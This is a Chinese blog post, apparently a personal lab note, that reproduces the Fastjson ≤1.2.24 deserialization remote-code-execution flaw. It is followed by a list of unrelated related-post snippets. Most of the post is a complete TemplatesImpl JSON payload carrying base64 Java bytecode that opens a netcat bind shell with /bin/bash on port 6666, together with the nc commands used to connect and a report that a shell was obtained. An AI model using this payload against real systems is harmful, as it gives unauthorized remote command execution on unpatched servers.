taiduge1
taiduge1

Fastjson1.0漏洞复现

服务器kali linux
攻击机win10
搭建好环境之后,测试漏洞
Fastjson1.0漏洞复现_第1张图片
证明存在漏洞
生成payload
{"@type":“com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl”,"_bytecodes":[“yv66vgAAADQAsAcAAgEAF2NvbS9zZWNmcmVlL3d3dy9QYXlsb2FkBwAEAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEABjxpbml0PgEAAygpVgEABENvZGUKAAMACQwABQAGCgALAA0HAAwBABFqYXZhL2xhbmcvUnVudGltZQwADgAPAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwgAEQEAGm5jIC1sIC1wIDY2NjYgLWUgL2Jpbi9iYXNoCgALABMMABQAFQEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsKABcAGQcAGAEAE2phdmEvaW8vSU9FeGNlcHRpb24MABoABgEAD3ByaW50U3RhY2tUcmFjZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABlMY29tL3NlY2ZyZWUvd3d3L1BheWxvYWQ7AQABZQEAFUxqYXZhL2lvL0lPRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAApFeGNlcHRpb25zBwAmAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAJcmVhZENsYXNzAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsHADMBABtqYXZhc3Npc3QvTm90Rm91bmRFeGNlcHRpb24HADUBACBqYXZhc3Npc3QvQ2Fubm90Q29tcGlsZUV4Y2VwdGlvbgoANwA5BwA4AQATamF2YXNzaXN0L0NsYXNzUG9vbAwAOgA7AQAKZ2V0RGVmYXVsdAEAFygpTGphdmFzc2lzdC9DbGFzc1Bvb2w7CgA3AD0MAD4APwEAA2dldAEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmFzc2lzdC9DdENsYXNzOwoAQQBDBwBCAQARamF2YXNzaXN0L0N0Q2xhc3MMAEQARQEACnRvQnl0ZWNvZGUBAAQoKVtCCgBHAEkHAEgBABBqYXZhL3V0aWwvQmFzZTY0DABKAEsBAApnZXRFbmNvZGVyAQAcKClMamF2YS91dGlsL0Jhc2U2NCRFbmNvZGVyOwoATQBPBwBOAQAYamF2YS91dGlsL0Jhc2U2NCRFbmNvZGVyDABQAFEBAA5lbmNvZGVUb1N0cmluZwEAFihbQilMamF2YS9sYW5nL1N0cmluZzsBAAljbGFzc25hbWUBABJMamF2YS9sYW5nL1N0cmluZzsBAAJjcAEAFUxqYXZhc3Npc3QvQ2xhc3NQb29sOwEAAmNjAQATTGphdmFzc2lzdC9DdENsYXNzOwEAAWIBAAJbQgEAB3BheWxvYWQBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwcAXQEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyCABfAQBVeyJAdHlwZSI6ImNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwiLCJfYnl0ZWNvZGVzIjpbIgoAXABhDAAFAGIBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYIAGQBABdjb20uc2VjZnJlZS53d3cuUGF5bG9hZAoAAQBmDAAwADEKAFwAaAwAaQBqAQAGYXBwZW5kAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7CABsAQADIl0sCABuAQAPIl9uYW1lIjoic2hpdCIsCABwAQAPIl90ZmFjdG9yeSI6e30sCAByAQAWIl9vdXRwdXRQcm9wZXJ0aWVzIjp7fQgAdAEAAX0KAFwAdgwAdwBbAQAIdG9TdHJpbmcBAARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgkAewB9BwB8AQAQamF2YS9sYW5nL1N5c3RlbQwAfgB/AQADb3V0AQAVTGphdmEvaW8vUHJpbnRTdHJlYW07CACBAQBFKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCgCDAIUHAIQBABNqYXZhL2lvL1ByaW50U3RyZWFtDACGAGIBAAdwcmludGxuCACIAQBFKiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAqCACKAQBNKiAgICAgICAgICAgICAgICAgIEZhc3Rqc29uIOWPjeW6j+WIl+WMluWPjeW8uSBTaGVsbCDohJrmnKwgICAgICAgICAgICAgICAgICoIAIwBAEUqICAgICAgICAgICAgICAgICAgICAgICAgICB3d3cuc2VjZnJlZS5jb20gICAgICAgICAgICAgICAgICAgICAgICAgICoIAI4BAEYqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioKCACQAQA5WypdIFVzYWdlOiBqYXZhIC1qYXIgRmFzdGpzb24tUGF5bG9hZC5qYXIgLS11c2UgMjAxNzAzMTUgCACSAQBpCSAyMDE3MDMxNSA9PiB7W0Zhc3Rqc29uIDw9IDEuMi4yNF0gW2h0dHBzOi8vZ2l0aHViLmNvbS9hbGliYWJhL2Zhc3Rqc29uL3dpa2kvc2VjdXJpdHlfdXBkYXRlXzIwMTcwMzE1XX0KCACUAQAIMjAxNzAzMTUKAJYAmAcAlwEAEGphdmEvbGFuZy9TdHJpbmcMAJkAmgEABmVxdWFscwEAFShMamF2YS9sYW5nL09iamVjdDspWggAnAEAKQpbKl0gVXNhZ2U6IFtGYXN0anNvbiBWZXJzaW9uIDw9IDEuMi4yNF0KCACeAQAoWytdIGNvbW1hbmQ6IG5jIC1sIC1wIDY2NjYgLWUgL2Jpbi9iYXNoCggAoAEAGFsqXSBHZW5lcmF0ZSBQYXlsb2FkOgoKCgoAAQCiDABaAFsIAKQBAAIKCggApgEAGlsrXSBTaGVsbDogbmMgYXR0YWNrIDY2NjYKCgCDAKgMAKkAYgEABXByaW50AQAEYXJncwEAE1tMamF2YS9sYW5nL1N0cmluZzsBAApTb3VyY2VGaWxlAQAMUGF5bG9hZC5qYXZhAQAMSW5uZXJDbGFzc2VzAQAHRW5jb2RlcgAhAAEAAwAAAAAABgABAAUABgABAAcAAAB4AAIAAgAAABYqtwAIuAAKEhC2ABJXpwAITCu2ABaxAAEABAANABAAFwADABsAAAAWAAUAAAAcAAQAHgANAB8AEQAgABUAIgAcAAAAFgACAAAAFgAdAB4AAAARAAQAHwAgAAEAIQAAABAAAv8AEAABBwABAAEHABcEAAEAIgAjAAIAJAAAAAQAAQAlAAcAAAA/AAAAAwAAAAGxAAAAAgAbAAAABgABAAAAJAAcAAAAIAADAAAAAQAdAB4AAAAAAAEAJwAoAAEAAAABACkAKgACAAEAIgArAAIAJAAAAAQAAQAlAAcAAABJAAAABAAAAAGxAAAAAgAbAAAABgABAAAAJwAcAAAAKgAEAAAAAQAdAB4AAAAAAAEAJwAoAAEAAAABACwALQACAAAAAQAuAC8AAwAJADAAMQACACQAAAAIAAMAFwAyADQABwAAAGsAAgAEAAAAF7gANkwrKrYAPE0stgBATrgARi22AEywAAAAAgAbAAAAEgAEAAAAKgAEACsACgAsAA8ALQAcAAAAKgAEAAAAFwBSAFMAAAAEABMAVABVAAEACgANAFYAVwACAA8ACABYAFkAAwAJAFoAWwACACQAAAAIAAMAFwAyADQABwAAAGYAAwAAAAAALrsAXFkSXrcAYBJjuABltgBnEmu2AGcSbbYAZxJvtgBnEnG2AGcSc7YAZ7YAdbAAAAACABsAAAAeAAcAAAAxAAkAMwAWADQAGwA1ACAANgAlADcAKgAxABwAAAACAAAACQB4AHkAAgAkAAAACAADABcAMgA0AAcAAAEDAAQAAQAAAJEqvp0ATrIAehKAtgCCsgB6Eoe2AIKyAHoSibYAgrIAehKHtgCCsgB6Eou2AIKyAHoSh7YAgrIAehKNtgCCsgB6Eo+2AIKyAHoSkbYAgqcAQxKTKgQytgCVmQA4sgB6Epu2AIKyAHoSnbYAgrIAersAXFkSn7cAYLgAobYAZxKjtgBntgB1tgCCsgB6EqW2AKexAAAAAwAbAAAAQgAQAAAAOwAFADwADQA9ABUAPgAdAD8AJQBAAC0AQQA1AEIAPQBDAEUARABNAEUAWwBGAGMARwBrAEgAiABJAJAATwAcAAAADAABAAAAkQCqAKsAAAAhAAAABgAC+wBQPwACAKwAAAACAK0ArgAAAAoAAQBNAEcArwAJ”],"_name":“shit”,"_tfactory":{},"_outputProperties":{}}

Fastjson1.0漏洞复现_第2张图片

然后win10监听

在这里插入图片描述

成功弹回shell.

因为利用的是nc反弹,所以要确保靶机可以执行nc命令
靶机执行:nc -l -p 6666 -e /bin/bash
本机:nc 192.168.80.155(靶机地址) 6666

参考文章:https://www.secfree.com/article/591.html

你可能感兴趣的:(个人笔记)

  • 有关Maven的个人笔记总结
    Mavenpom.xml文件详解一级标签bulid(定义了项目的构建配置,包括编译、测试、打包等过程。可以指定插件和构建生命周期。)dependces(列出了项目依赖的所有外部库。每个依赖项都指定了其坐标(groupId,artifactId,version))depencymanagement(用于集中管理依赖版本,确保所有子模块使用相同的依赖版本,用于解决jar包依赖其他jar包产生的版本冲突
  • 个人笔记(linux/sort与uniq命令)
    sort命令(排序)功能:行排序核心语法:sort[选项][文件]常用选项:选项作用示例-n数值排序sort-n-r降序排序sort-nr-k指定排序列sort-k2,2n-t指定分隔符sort-t':'-k3n-u去重(相当于uniq)sort-u典型用法:#按第二列数字降序排序sort-k2,2nrdata.txt#处理CSV文件(以逗号分隔)sort-t','-k3ndata.csv注意事项
  • vue3面试题(个人笔记) 武昌库里写JAVA 面试题汇总与解析课程设计springbootvue.jsjava学习
    vue3比vue2有什么优势?性能更好,打包体积更小,更好的ts支持,更好的代码组织,更好的逻辑抽离,更多的新功能。描述Vue3生命周期CompositionAPI的生命周期:onMounted()onUpdated()onUnmounted()onBeforeMount()onBeforeUpdate()onBeforeUnmount()onErrorCaptured()onRenderTrac
  • swagger【个人笔记】 撰卢 笔记java
    文章目录swagger导入mave坐标在配置类(WebMvcConfiguration)中加入knife4j相关配置设置静态资源映射,主要是让拦截器放行swagger常用注解@Api(tags="\[描述这个类的作用]")@ApiModel(description="\[描述这个类的作用]")@ApiModelProPerty("描述这个类的作用")@ApiOperation("\[描述方法的作用
  • 【个人笔记】负载均衡 撰卢 笔记负载均衡运维
    文章目录nginx反向代理的好处负载均衡负载均很的配置方式均衡负载的方式nginx反向代理的好处提高访问速度进行负载均衡保证后端服务安全负载均衡负载均衡,就是把大量的请求按照我们指定的方式均衡的分配给集群中的每台服务器负载均很的配置方式upstreamwebservers{server192.168.100.128:8080server192.168.100.129:8080}server{lis
  • 计算机网络(王道考研)笔记个人整理——第六章:应用层 onlyTonight 计算机网络计算机网络考研笔记
    第六章:应用层点击上方专栏查看六章全部笔记个人笔记整理位置:个人笔记完整版b站视频:王道考研(2019版)概述应用层对应用程序的通信提供服务。应用层协议定义:应用程序交换的报文类型(请求or响应);各个报文类型的语法,如报文中的各个字段及其详细描述;字段的语义,即包含在字段中的信息的含义;进程何时、如何发送报文,以及对报文进行响应的规则。功能:文件传输、访问和管理;电子邮件;虚拟终端;查询服务和远
  • vue3项目的筛选是树状 el-tree 二级树结构(个人笔记) 齐露 笔记vue.js前端
    先说一下筛选要求:可以多选,可以全选,可以取消全选(清空),可以关键字筛选(以下案例仅限于二级的树结构,多级的没有试),截图如下:废话不多说,上代码全选清空letform=reactive({certificationCategory:[],...})letcertificate_list=ref([//el-tree的内容{click:"AUTO",name:'电力业务许可证',value:'电
  • 我的创作纪念日 茉莉玫瑰花茶 个人感想
    一、初心:技术分享与自我提升成为一名创作者的初衷,源于我在技术学习和实战项目中的点滴积累。在日常的学习和工作中,我常常会遇到一些有趣的技术问题,也会掌握一些实用的解决方案。最初,我只是将这些内容记录在个人笔记中,但后来发现,通过分享这些经验,不仅可以帮助到更多有需要的人,还能促使自己更深入地思考和总结知识。于是,我决定在CSDN上开设博客,将自己的技术心得以文章的形式呈现出来。我的博客茉莉玫瑰花茶
  • C++入门笔记 张峻铖 C++c++
    写在开头初衷:对于一个程序员/算法工程师来说,只会Python未免过于单薄了。出于未来找工作的需要,开始学习C++,并使用C++刷LeetCode。背景:本科有C语言课程,甚至学过汇编,研究生阶段主要使用Python。提醒:该系列文章以尽可能快地应用C++(刷题)为目的,暂以B站黑马程序员C++教程为教材,主要记录重点内容和对个人来讲不易理解或陌生的内容,具有较浓的个人笔记特点,因此,在全面性和权
  • 黑马SpringCloud-day01-MybatisPlus-个人笔记 dkeml springcloud笔记spring
    Mybatis-plus一.约定类名(驼峰转下划线)作表名id作主键变量名(驼峰转下划线)转字段名二.自定义配置1.@TableName(“tb_user”)指定表名2.@TableId(value=“id”,type=“策略”)type:AUTO:数据库自增长INPUT:通过set方法自行输入ASSIGN_ID:全局唯一ID生成器默认为雪花算法3.@TableField(“name”)场景:变量
  • 清风数学建模个人笔记--模糊综合评价 fvdj0 数学建模笔记
    目录一、量二、分类三、模糊函数的三种表示方法四、应用:模糊综合评价(评判)一、量①确定性:经典数学(几何、代数)②不确定性:随机性(概率论、随机过程)灰性(灰色系统)模糊性(模糊数学)二、分类:偏小型:年轻、小、冷中间型:中年、中、暖偏大型:年老、大、热三、模糊函数的三种表示方法(1)模糊统计法(设计调查问卷,不推荐,主观性最弱)(2)借助已有的尺度(需要已有的指标,并能收集到数据)论域模糊集隶属
  • PyCharm专业版和社区版本的区别 王胖胖~ pycharmidepython
    【个人笔记仅供参考】官网:https://www.jetbrains.com/pycharm/点击Download进入下载页面上面的是专业版下面的是社区版本PyCharm专业版与社区版的核心区别【基于2025.1版本的最新对比】一、功能差异1、核心功能免费,专业版解锁高级工具自2025.1版本起,PyCharm整合为统一产品,基础功能(如代码编辑、调试、Git支持、JupyterNotebook基
  • 个人与企业知识管理的Python笔记软件解决方案 Emmamkq~~
    本文还有配套的精品资源,点击获取简介:本项目基于Django和Vue.js框架,旨在构建一款集个人笔记管理与企业知识仓库功能的应用。Django后端处理用户认证、数据模型、API接口及服务器端渲染,而Vue.js前端则专注于用户界面、交互和数据动态绑定。软件包含完整的CMS功能,如笔记分类、标签管理和权限控制。安全性和性能优化是开发过程中的关键点,部署则考虑使用常见的Web服务器和WSGI服务器。
  • JavaSE-泛型(个人笔记,勿喷) Br子铭 日常学习笔记笔记java
    认识泛型介绍泛型简单介绍:约束一个类中特定元素的类型。泛型仅仅是java的语法糖,它不会影响java虚拟机生成的汇编代码,在编译阶段,虚拟机就会把泛型的类型擦除,还原成没有泛型的代码,顶多编译速度稍微慢一些,执行速度是完全没有什么区别的.所谓泛型指的是,在定义类、接口、方法时,同时声明了一个或者多个类型变量(如:),称为泛型类、泛型接口、泛型方法、它们统称为泛型。作用1.约束容器类中元素的类型。2
  • RISC-V 开发板 + Ubuntu 23.04 部署 open_vins 过程 地衣君 SLAMrisc-vubuntulinux
    RISC-V开发板+Ubuntu23.04部署open_vins过程1.背景介绍2.问题描述3.解决过程3.1卸载旧版本3.2安装Suitesparsev5.8.03.3安装CeresSolverv2.0.03.4解决编译爆内存问题同步发布在个人笔记RISC-V开发板+Ubuntu23.04部署open_vins过程1.背景介绍最近遇到一个需求,就是在RISC-V开发板:进迭时空MUSEPiPro
  • Ubuntu创建修改 Swap 文件分区的步骤——解决嵌入式开发板编译ROS2程序卡死问题 地衣君 SLAMubuntulinux
    Ubuntu创建修改Swap文件分区的步骤——解决嵌入式开发板编译ROS2程序卡死问题1.问题描述2.创建/修改Swap分区2.1创建Swap文件(推荐)2.2使用Swap分区(如果已经存在)3.注意事项同步发布在个人笔记Ubuntu创建修改Swap文件分区的步骤——解决嵌入式开发板编译ROS2程序卡死问题1.问题描述在RISC-V的嵌入式开发板上部署open_vins方案的时候,编译过程会导致板
  • 快速了解GO+ElasticSearch 我的golang之路果然有问题 golangelasticsearch开发语言笔记后端经验分享
    更多个人笔记见:(注意点击“继续”,而不是“发现新项目”)github个人笔记仓库https://github.com/ZHLOVEYY/IT_notegitee个人笔记仓库https://gitee.com/harryhack/it_note个人学习,学习过程中还会不断补充~(后续会更新在github上)文章目录简单介绍经典例子示范demo代码优化后的代码参考:es返回格式示例:空指针问题简单介
  • ElasticSearch+Gin+Gorm简单示例 我的golang之路果然有问题 elasticsearchgin大数据golang开发语言后端搜索引擎
    更多个人笔记见:(注意点击“继续”,而不是“发现新项目”)github个人笔记仓库https://github.com/ZHLOVEYY/IT_notegitee个人笔记仓库https://gitee.com/harryhack/it_note个人学习,学习过程中还会不断补充~(后续会更新在github上)项目地址(失效可以去我笔记中查找)GO使用Gin+Gorm+ES简单示例目录post-pla
  • 【运维】内网中自建dns,smartdns,mosdns,实现dns转发,内外网分流 chenzfp 运维运维
    在自己的内网环境中,如pve内网环境,部分机器不能直接配置公网dns,或者需要使用dns来做国内/国外网络分流,此时考虑自建dns,以下两种方案为个人笔记记录,仅供参考smartdnsSmartDNS是一个运行在本地的DNS服务器,它接受来自本地客户端的DNS查询请求,然后从多个上游DNS服务器获取DNS查询结果,并将访问速度最快的结果返回给客户端,以此提高网络访问速度。SmartDNS同时支持指
  • 【godot游戏引擎学习笔记】初识界面 知兀 Godot游戏引擎学习中godot游戏引擎笔记
    个人笔记,学习自B站视频BV1ut42177r8目录渲染器的选择Forward+移动兼容编辑器页面浏览场景(左上角)文件浏览器(左下角)属性检查器(右侧)场景编辑器(中间)(顶部)2D和3D模式Script界面AssetLib渲染器的选择Forward+渲染器就是Godot为我们渲染游戏画面的工具,Godot4主要使用Vulkan渲染引擎进行画面渲染我们一般在制作3D游戏的时候,选择Forward
  • GO+RabbitMQ+Gin+Gorm+docker 部署 demo 我的golang之路果然有问题 golangrabbitmqgin后端学习笔记docker
    更多个人笔记见:github个人笔记仓库gitee个人笔记仓库个人学习,学习过程中还会不断补充~(后续会更新在github和gitee上)文章目录目录准备运行测试postman检查容器链接:项目连接,完整项目代码仓库下载https://gitee.com/harryhack/it_note/tree/main/%E5%90%8E%E7%AB%AF%E7%AC%94%E8%AE%B0/%E5%B8%
  • RabbitMQ-Go 性能分析 我的golang之路果然有问题 rabbitmqgolang分布式后端学习笔记
    更多个人笔记见:github个人笔记仓库gitee个人笔记仓库个人学习,学习过程中还会不断补充~(后续会更新在github和gitee上)文章目录对比功能没有rabbitMQ有rabbitMQwrk测试分析链接:项目连接,完整项目代码仓库下载https://gitee.com/harryhack/it_note/tree/main/%E5%90%8E%E7%AB%AF%E7%AC%94%E8%AE
  • 快速掌握 GO 之 RabbitMQ 我的golang之路果然有问题 golangrabbitmq开发语言后端笔记经验分享
    更多个人笔记见:github个人笔记仓库gitee个人笔记仓库个人学习,学习过程中还会不断补充~(后续会更新在github和gitee上)文章目录作用经典例子生产者(发送端)消费者(接收端)作用类似一个“中间过渡器”,应对突发流量导致数据库连接池耗尽或者请求导致服务崩溃流量洪峰:促销活动时,前置Nginx将请求写入RabbitMQ,后端服务按能力消费容灾恢复:数据库故障期间,消息持久化在队列;恢复
  • 快速掌握 GO 之 RabbitMQ 结合 gin+gorm 案例 我的golang之路果然有问题 rabbitmqgingolang后端学习笔记
    更多个人笔记见:github个人笔记仓库gitee个人笔记仓库个人学习,学习过程中还会不断补充~(后续会更新在github和gitee上)文章目录gin+gorm框架例子服务端生产者数据库存储客户端消费者访问测试gin+gorm框架例子post-platform/├──main.go#Gin服务(生产者)├──rabbitmq.go#RabbitMQ操作├──models/│└──post.go#
  • 飞牛Nas如何实现阿里云盘、百度网盘的资料迁移! xiaoqiangclub 随记·2025✍️飞牛nasfnos百度网盘阿里网盘资料迁移
    文章目录介绍演示环境如何使用飞牛NAS实现阿里云盘与百度网盘的数据互相迁移操作步骤注意事项⚓️相关链接⚓️介绍你是否有将百度网盘的文件迁移到阿里云盘,或是将阿里云盘的资料转移到百度网盘的需求?本文将给大家演示如何使用飞牛Nas,实现这两个云盘之间的资料互相迁移。演示环境本文演示环境如下:操作系统:Windows11NAS设备:飞牛NasNAS系统:fnOS注意:本文内容为个人笔记,仅供参考。附:读
  • 【个人笔记】OpenCV4 C++ 图像处理与视频分析 13课 啦啦啦大赛第大所 OpenCV4C++c++计算机视觉opencv图像处理
    个人资料,仅供学习使用修改时间——2022年2月19日21:11:31学习课程:OpenCV4图像处理与视频分析实战教程课程讲师:贾志刚13自定义滤波opencv知识点:将图像与内核卷积-filter2D缩放取绝对值转换为8位-convertScaleAbs本课所解决的问题:什么是自定义滤波?如果实现自定义滤波的均值卷积?如果实现自定义滤波的非均值卷积?1.自定义滤波我们知道,不同卷积核下的图像卷
  • 快速了解 GO之接口解耦 我的golang之路果然有问题 golang开发语言后端学习笔记
    更多个人笔记见:github个人笔记仓库gitee个人笔记仓库个人学习,学习过程中还会不断补充~(后续会更新在github上)文章目录例子分析解耦一般的构建思路解耦的构建思路接口解耦的作用是便于切换三方库(项目需要或者三方库废弃不维护)等时候,不用大量修改代码而构建的设计例子分析解耦xorm和gorm如果希望互相切换,使用上区别在于二者创建数据库的方法不同,xorm为Insert,gorm为Cre
  • Go 语言基础1 Slice,map,string 我的golang之路果然有问题 golang开发语言后端笔记学习go1.19
    更多个人笔记见:github个人笔记仓库gitee个人笔记仓库个人学习,学习过程中还会不断补充~(后续会更新在github上)文章目录stirng字符串区分rune,byte,string字符串操作strings库相关fmt.Printf语法Slice切片基础知识数组和切片的区别append函数通过append看切片和扩容通过append合并切片利用\[:]的方式制造切片截取示范截取的地址分析:=
  • Go 语言基础 2 Func,流程控制 我的golang之路果然有问题 golang开发语言后端笔记经验分享
    更多个人笔记见:github个人笔记仓库gitee个人笔记仓库个人学习,学习过程中还会不断补充~(后续会更新在github上)文章目录Func函数函数栈概念函数表示类型Anonymousfunc匿名函数closure闭包基础示例http利用闭包裹挟中间件流程控制ifelseswitch代码Func函数函数是一等公民!!可以作为返回值,用作变量或者赋值等函数栈概念函数调用的时候消耗栈空间,因为调用完
  • Halcon仿射变换---个人笔记 爱凤的小光 Halcon软件Halcon
    文章目录1.概述2.仿射变换类型3.仿射变换流程4.根据特征点、角度计算仿射变换矩阵4.1从空变换矩阵创建仿射变换矩阵4.2把旋转角度添加到仿射变换矩阵4.3把缩放添加到仿射变换矩阵4.4把平移添加到防射变换矩阵4.5把斜切添加到仿射变换矩阵4.6根据点和角度计算刚性仿射变换矩阵4.7实战Demo(把车牌号码转正)5.根据多个以上特征点计算仿射变换矩阵5.1根据两个以上特征点计算仿射变换矩阵5.2
  • java解析APK 3213213333332132 javaapklinux解析APK
    解析apk有两种方法 1、结合安卓提供apktool工具,用java执行cmd解析命令获取apk信息 2、利用相关jar包里的集成方法解析apk 这里只给出第二种方法,因为第一种方法在linux服务器下会出现不在控制范围之内的结果。 public class ApkUtil { /** * 日志对象 */ private static Logger
  • nginx自定义ip访问N种方法 ronin47 nginx 禁止ip访问
       因业务需要,禁止一部分内网访问接口, 由于前端架了F5,直接用deny或allow是不行的,这是因为直接获取的前端F5的地址。    所以开始思考有哪些主案可以实现这样的需求,目前可实施的是三种:    一:把ip段放在redis里,写一段lua           二:利用geo传递变量,写一段
  • mysql timestamp类型字段的CURRENT_TIMESTAMP与ON UPDATE CURRENT_TIMESTAMP属性 dcj3sjt126com mysql
    timestamp有两个属性,分别是CURRENT_TIMESTAMP 和ON UPDATE CURRENT_TIMESTAMP两种,使用情况分别如下:   1.   CURRENT_TIMESTAMP    当要向数据库执行insert操作时,如果有个timestamp字段属性设为   CURRENT_TIMESTAMP,则无论这
  • struts2+spring+hibernate分页显示 171815164 Hibernate
    分页显示一直是web开发中一大烦琐的难题,传统的网页设计只在一个JSP或者ASP页面中书写所有关于数据库操作的代码,那样做分页可能简单一点,但当把网站分层开发后,分页就比较困难了,下面是我做Spring+Hibernate+Struts2项目时设计的分页代码,与大家分享交流。   1、DAO层接口的设计,在MemberDao接口中定义了如下两个方法: public in
  • 构建自己的Wrapper应用 g21121 rap
            我们已经了解Wrapper的目录结构,下面可是正式利用Wrapper来包装我们自己的应用,这里假设Wrapper的安装目录为:/usr/local/wrapper。           首先,创建项目应用   &nb
  • [简单]工作记录_多线程相关 53873039oycg 多线程
         最近遇到多线程的问题,原来使用异步请求多个接口(n*3次请求)     方案一 使用多线程一次返回数据,最开始是使用5个线程,一个线程顺序请求3个接口,超时终止返回     缺点       测试发现必须3个接
  • 调试jdk中的源码,查看jdk局部变量 程序员是怎么炼成的 jdk 源码
    转自:http://www.douban.com/note/211369821/    学习jdk源码时使用--   学习java最好的办法就是看jdk源代码,面对浩瀚的jdk(光源码就有40M多,比一个大型网站的源码都多)从何入手呢,要是能单步调试跟进到jdk源码里并且能查看其中的局部变量最好了。 可惜的是sun提供的jdk并不能查看运行中的局部变量
  • Oracle RAC Failover 详解 aijuans oracle
    Oracle RAC 同时具备HA(High Availiablity) 和LB(LoadBalance). 而其高可用性的基础就是Failover(故障转移). 它指集群中任何一个节点的故障都不会影响用户的使用,连接到故障节点的用户会被自动转移到健康节点,从用户感受而言, 是感觉不到这种切换。 Oracle 10g RAC 的Failover 可以分为3种: 1. Client-Si
  • form表单提交数据编码方式及tomcat的接受编码方式 antonyup_2006 JavaScripttomcat浏览器互联网servlet
    原帖地址:http://www.iteye.com/topic/266705 form有2中方法把数据提交给服务器,get和post,分别说下吧。 (一)get提交 1.首先说下客户端(浏览器)的form表单用get方法是如何将数据编码后提交给服务器端的吧。    对于get方法来说,都是把数据串联在请求的url后面作为参数,如:http://localhost:
  • JS初学者必知的基础 百合不是茶 js函数js入门基础
    JavaScript是网页的交互语言,实现网页的各种效果, JavaScript 是世界上最流行的脚本语言。 JavaScript 是属于 web 的语言,它适用于 PC、笔记本电脑、平板电脑和移动电话。 JavaScript 被设计为向 HTML 页面增加交互性。 许多 HTML 开发者都不是程序员,但是 JavaScript 却拥有非常简单的语法。几乎每个人都有能力将小的
  • iBatis的分页分析与详解 bijian1013 javaibatis
            分页是操作数据库型系统常遇到的问题。分页实现方法很多,但效率的差异就很大了。iBatis是通过什么方式来实现这个分页的了。查看它的实现部分,发现返回的PaginatedList实际上是个接口,实现这个接口的是PaginatedDataList类的对象,查看PaginatedDataList类发现,每次翻页的时候最
  • 精通Oracle10编程SQL(15)使用对象类型 bijian1013 oracle数据库plsql
    /* *使用对象类型 */ --建立和使用简单对象类型 --对象类型包括对象类型规范和对象类型体两部分。 --建立和使用不包含任何方法的对象类型 CREATE OR REPLACE TYPE person_typ1 as OBJECT( name varchar2(10),gender varchar2(4),birthdate date ); drop type p
  • 【Linux命令二】文本处理命令awk bit1129 linux命令
    awk是Linux用来进行文本处理的命令,在日常工作中,广泛应用于日志分析。awk是一门解释型编程语言,包含变量,数组,循环控制结构,条件控制结构等。它的语法采用类C语言的语法。   awk命令用来做什么? 1.awk适用于具有一定结构的文本行,对其中的列进行提取信息 2.awk可以把当前正在处理的文本行提交给Linux的其它命令处理,然后把直接结构返回给awk 3.awk实际工
  • JAVA(ssh2框架)+Flex实现权限控制方案分析 白糖_ java
      目前项目使用的是Struts2+Hibernate+Spring的架构模式,目前已经有一套针对SSH2的权限系统,运行良好。但是项目有了新需求:在目前系统的基础上使用Flex逐步取代JSP,在取代JSP过程中可能存在Flex与JSP并存的情况,所以权限系统需要进行修改。 【SSH2权限系统的实现机制】 权限控制分为页面和后台两块:不同类型用户的帐号分配的访问权限是不同的,用户使
  • angular.forEach boyitech AngularJSAngularJS APIangular.forEach
    angular.forEach 描述: 循环对obj对象的每个元素调用iterator, obj对象可以是一个Object或一个Array. Iterator函数调用方法: iterator(value, key, obj), 其中obj是被迭代对象,key是obj的property key或者是数组的index,value就是相应的值啦. (此函数不能够迭代继承的属性.)
  • java-谷歌面试题-给定一个排序数组,如何构造一个二叉排序树 bylijinnan 二叉排序树
    import java.util.LinkedList; public class CreateBSTfromSortedArray { /** * 题目:给定一个排序数组,如何构造一个二叉排序树 * 递归 */ public static void main(String[] args) { int[] data = { 1, 2, 3, 4,
